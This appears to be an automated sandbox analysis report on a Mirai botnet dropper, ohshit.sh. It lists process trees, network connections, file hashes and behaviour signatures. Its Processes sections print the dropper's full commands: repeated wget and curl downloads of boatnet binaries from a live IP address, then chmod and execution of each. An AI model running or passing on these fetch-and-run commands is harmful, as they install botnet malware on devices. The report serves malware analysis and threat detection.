/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arm6]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arm6]

/bin/cat

[cat boatnet.arm6]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arm7]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arm7]

/bin/cat

[cat boatnet.arm7]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.ppc]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.ppc]

/bin/cat

[cat boatnet.ppc]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.spc]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.spc]

/bin/cat

[cat boatnet.spc]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.m68k]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.m68k]

/bin/cat

[cat boatnet.m68k]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.sh4]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.sh4]

/bin/cat

[cat boatnet.sh4]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]

/tmp/WTF

[./WTF]

Network

Country Destination Domain Proto
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp

Files

/tmp/boatnet.x86

MD5 895badd48eed0c0e0ba14e8d5967e7bb
SHA1 3c4c22665e6197841f7e68f941a4a27dca3d4d8d
SHA256 e2a04bd1fb1e7ed211e3ee19b08337b6361d695278417d5a21ba602ca7eb99b4
SHA512 dfc79a34d1694b7e4422fa4861bf475b3efe2398df684126e71293880f51f4bf39f396fb5c5e36a2c12944c7406e86cac09c3d3b8c432194aab976c8b7e94af7

/tmp/WTF

MD5 e3206d28c93769f5acb5e1e1d5b5f219
SHA1 198b56e1df06819e1141c1d6e8f7ad7d1646194c
SHA256 cdf3f41e3ad38f3081c882ac25d15d03b9e85b7b7021cbd32a6c504acd353aab
SHA512 dad4a759472131bed86139904962c9ce218dbba129e866fabfb524392e2ef8e77f30087d80305eef0452b5f5e685a5d5103e2ee6518b6b9c103fb55b8cfd3503

/tmp/WTF

MD5 d94c95baa8be09e30fcdc154241477c8
SHA1 d0b682898bd94b01afb6ad2f4fb813197f6a0985
SHA256 2bcc0d44bafdbdecf7e537c3cf0357ab7f6fa5e7a2820e950e4f33a2ae08c6c6
SHA512 7cebf14f7ecfe09c18b161607284a58c771a305b36a4f069493ce813b1cee9bea639412e3fb7d1e492ce889b553ae2512c709b9a3dd2ca86f08b84a07c59e1b9

/tmp/WTF

MD5 f1c24d9fa40a047ae22d2d3ae7dfeac9
SHA1 750274b02d5f5b00026a4f55b020f4285c693533
SHA256 219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc
SHA512 36bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259

/tmp/WTF

MD5 a8f502a6fb3b7b940e922c951d9e493a
SHA1 fa94d6dade6bb7537ee3f58f2984b80f4b02dcdf
SHA256 748429c25463cc890809a866bfe2cb313f072be73bf5ea88fb4f65e26aa97bec
SHA512 e4ada74640d3ad58a6181ab1cd05fadd584788806908b00cf80924a19f29118a17f581d72d9abf1aa207f83d1e4ab163ea6c0c1e0ee6f2e211d1e0d366a27338

/tmp/WTF

MD5 fb08806a49f2c5aa8f8ea71c0ca40395
SHA1 411ae81e99b9c3ec9d27514a7c18cb5c63189b22
SHA256 2f7082951d3b09a10a5308258951b0d2efe7b1717e543e9d51e53e482d00479c
SHA512 60c4b894a8b169553d63dc8ec09d51ab447dc8644fd382265580368e09bcd6681525c1ebba1a5b44531015b060a7f9ab831d6319e92366243f94e4e2225c74b3

memory/763-1-0x00008000-0x0001dca4-memory.dmp

memory/784-2-0x00008000-0x0001b6e4-memory.dmp

memory/801-3-0x00008000-0x000228c4-memory.dmp

memory/806-4-0x00008000-0x00026464-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-09 04:14

Reported

2024-11-09 04:17

Platform

debian9-mipsbe-20240611-en

Max time kernel

148s

Max time network

141s

Command Line

[/tmp/ohshit.sh]

Signatures

Mirai

botnet mirai

Mirai family

mirai

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A

Modifies Watchdog functionality

defense_evasion
Description Indicator Process Target
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A

Writes file to system bin folder

Description Indicator Process Target
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/677/cmdline /tmp/WTF N/A
File opened for reading /proc/759/cmdline /tmp/WTF N/A
File opened for reading /proc/782/cmdline /tmp/WTF N/A
File opened for reading /proc/794/cmdline /tmp/WTF N/A
File opened for reading /proc/805/cmdline /tmp/WTF N/A
File opened for reading /proc/813/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/668/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/671/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/824/cmdline /tmp/WTF N/A
File opened for reading /proc/687/cmdline /tmp/WTF N/A
File opened for reading /proc/750/cmdline /tmp/WTF N/A
File opened for reading /proc/757/cmdline /tmp/WTF N/A
File opened for reading /proc/818/cmdline /tmp/WTF N/A
File opened for reading /proc/887/cmdline /tmp/WTF N/A
File opened for reading /proc/717/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/855/cmdline /tmp/WTF N/A
File opened for reading /proc/709/cmdline /tmp/WTF N/A
File opened for reading /proc/826/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/701/cmdline /tmp/WTF N/A
File opened for reading /proc/702/cmdline /tmp/WTF N/A
File opened for reading /proc/707/cmdline /tmp/WTF N/A
File opened for reading /proc/784/cmdline /tmp/WTF N/A
File opened for reading /proc/808/cmdline /tmp/WTF N/A
File opened for reading /proc/760/cmdline /tmp/WTF N/A
File opened for reading /proc/827/cmdline /tmp/WTF N/A
File opened for reading /proc/851/cmdline /tmp/WTF N/A
File opened for reading /proc/869/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/893/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/706/cmdline /tmp/WTF N/A
File opened for reading /proc/874/cmdline /tmp/WTF N/A
File opened for reading /proc/892/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/806/cmdline /tmp/WTF N/A
File opened for reading /proc/789/cmdline /tmp/WTF N/A
File opened for reading /proc/817/cmdline /tmp/WTF N/A
File opened for reading /proc/898/cmdline /tmp/WTF N/A
File opened for reading /proc/678/cmdline /tmp/WTF N/A
File opened for reading /proc/875/cmdline /tmp/WTF N/A
File opened for reading /proc/904/cmdline /tmp/WTF N/A
File opened for reading /proc/414/cmdline /tmp/WTF N/A
File opened for reading /proc/823/cmdline /tmp/WTF N/A
File opened for reading /proc/881/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/708/cmdline /tmp/WTF N/A
File opened for reading /proc/711/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/811/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/boatnet.ppc /usr/bin/wget N/A
File opened for modification /tmp/boatnet.ppc /usr/bin/curl N/A
File opened for modification /tmp/boatnet.spc /usr/bin/curl N/A
File opened for modification /tmp/boatnet.x86 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.mpsl /usr/bin/wget N/A
File opened for modification /tmp/boatnet.mpsl /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm7 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.m68k /usr/bin/curl N/A
File opened for modification /tmp/boatnet.i686 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm6 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.mips /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arc /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm6 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.sh4 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.i468 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm7 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.spc /usr/bin/wget N/A
File opened for modification /tmp/boatnet.sh4 /usr/bin/wget N/A
File opened for modification /tmp/WTF /tmp/ohshit.sh N/A
File opened for modification /tmp/boatnet.arc /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm5 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm5 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.x86 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.mips /usr/bin/curl N/A
File opened for modification /tmp/boatnet.x86_64 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.m68k /usr/bin/wget N/A

Processes

/tmp/ohshit.sh

[/tmp/ohshit.sh]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.x86]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.x86]

/bin/cat

[cat boatnet.x86]

/bin/chmod

[chmod +x boatnet.x86 ohshit.sh systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-XTVJnW WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.mips]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.mips]

/bin/cat

[cat boatnet.mips]

/bin/chmod

[chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-XTVJnW WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arc]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arc]

/bin/cat

[cat boatnet.arc]

/bin/chmod

[chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-XTVJnW WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.i468]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.i468]

/bin/cat

[cat boatnet.i468]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-XTVJnW WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.i686]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.i686]

/bin/cat

[cat boatnet.i686]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-XTVJnW WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.x86_64]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.x86_64]

/bin/cat

[cat boatnet.x86_64]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-XTVJnW WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.mpsl]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.mpsl]

/bin/cat

[cat boatnet.mpsl]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-XTVJnW WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arm]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arm]

/bin/cat

[cat boatnet.arm]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arm5]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arm5]

/bin/cat

[cat boatnet.arm5]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arm6]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arm6]

/bin/cat

[cat boatnet.arm6]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arm7]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arm7]

/bin/cat

[cat boatnet.arm7]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.ppc]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.ppc]

/bin/cat

[cat boatnet.ppc]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.spc]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.spc]

/bin/cat

[cat boatnet.spc]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.m68k]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.m68k]

/bin/cat

[cat boatnet.m68k]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.sh4]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.sh4]

/bin/cat

[cat boatnet.sh4]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]

/tmp/WTF

[./WTF]

Network

Country Destination Domain Proto
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp

Files

/tmp/boatnet.x86

MD5 895badd48eed0c0e0ba14e8d5967e7bb
SHA1 3c4c22665e6197841f7e68f941a4a27dca3d4d8d
SHA256 e2a04bd1fb1e7ed211e3ee19b08337b6361d695278417d5a21ba602ca7eb99b4
SHA512 dfc79a34d1694b7e4422fa4861bf475b3efe2398df684126e71293880f51f4bf39f396fb5c5e36a2c12944c7406e86cac09c3d3b8c432194aab976c8b7e94af7

/tmp/WTF

MD5 e3206d28c93769f5acb5e1e1d5b5f219
SHA1 198b56e1df06819e1141c1d6e8f7ad7d1646194c
SHA256 cdf3f41e3ad38f3081c882ac25d15d03b9e85b7b7021cbd32a6c504acd353aab
SHA512 dad4a759472131bed86139904962c9ce218dbba129e866fabfb524392e2ef8e77f30087d80305eef0452b5f5e685a5d5103e2ee6518b6b9c103fb55b8cfd3503

memory/747-1-0x00400000-0x00451a58-memory.dmp

/tmp/WTF

MD5 d94c95baa8be09e30fcdc154241477c8
SHA1 d0b682898bd94b01afb6ad2f4fb813197f6a0985
SHA256 2bcc0d44bafdbdecf7e537c3cf0357ab7f6fa5e7a2820e950e4f33a2ae08c6c6
SHA512 7cebf14f7ecfe09c18b161607284a58c771a305b36a4f069493ce813b1cee9bea639412e3fb7d1e492ce889b553ae2512c709b9a3dd2ca86f08b84a07c59e1b9

/tmp/WTF

MD5 f1c24d9fa40a047ae22d2d3ae7dfeac9
SHA1 750274b02d5f5b00026a4f55b020f4285c693533
SHA256 219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc
SHA512 36bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259

/tmp/WTF

MD5 a8f502a6fb3b7b940e922c951d9e493a
SHA1 fa94d6dade6bb7537ee3f58f2984b80f4b02dcdf
SHA256 748429c25463cc890809a866bfe2cb313f072be73bf5ea88fb4f65e26aa97bec
SHA512 e4ada74640d3ad58a6181ab1cd05fadd584788806908b00cf80924a19f29118a17f581d72d9abf1aa207f83d1e4ab163ea6c0c1e0ee6f2e211d1e0d366a27338

/tmp/WTF

MD5 fb08806a49f2c5aa8f8ea71c0ca40395
SHA1 411ae81e99b9c3ec9d27514a7c18cb5c63189b22
SHA256 2f7082951d3b09a10a5308258951b0d2efe7b1717e543e9d51e53e482d00479c
SHA512 60c4b894a8b169553d63dc8ec09d51ab447dc8644fd382265580368e09bcd6681525c1ebba1a5b44531015b060a7f9ab831d6319e92366243f94e4e2225c74b3

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-09 04:14

Reported

2024-11-09 04:17

Platform

debian9-mipsel-20240418-en

Max time kernel

149s

Max time network

139s

Command Line

[/tmp/ohshit.sh]

Signatures

Mirai

botnet mirai

Mirai family

mirai

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A

Modifies Watchdog functionality

defense_evasion
Description Indicator Process Target
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A

Writes file to system bin folder

Description Indicator Process Target
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/896/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/659/cmdline /tmp/WTF N/A
File opened for reading /proc/666/cmdline /tmp/WTF N/A
File opened for reading /proc/712/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/882/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/665/cmdline /tmp/WTF N/A
File opened for reading /proc/686/cmdline /tmp/WTF N/A
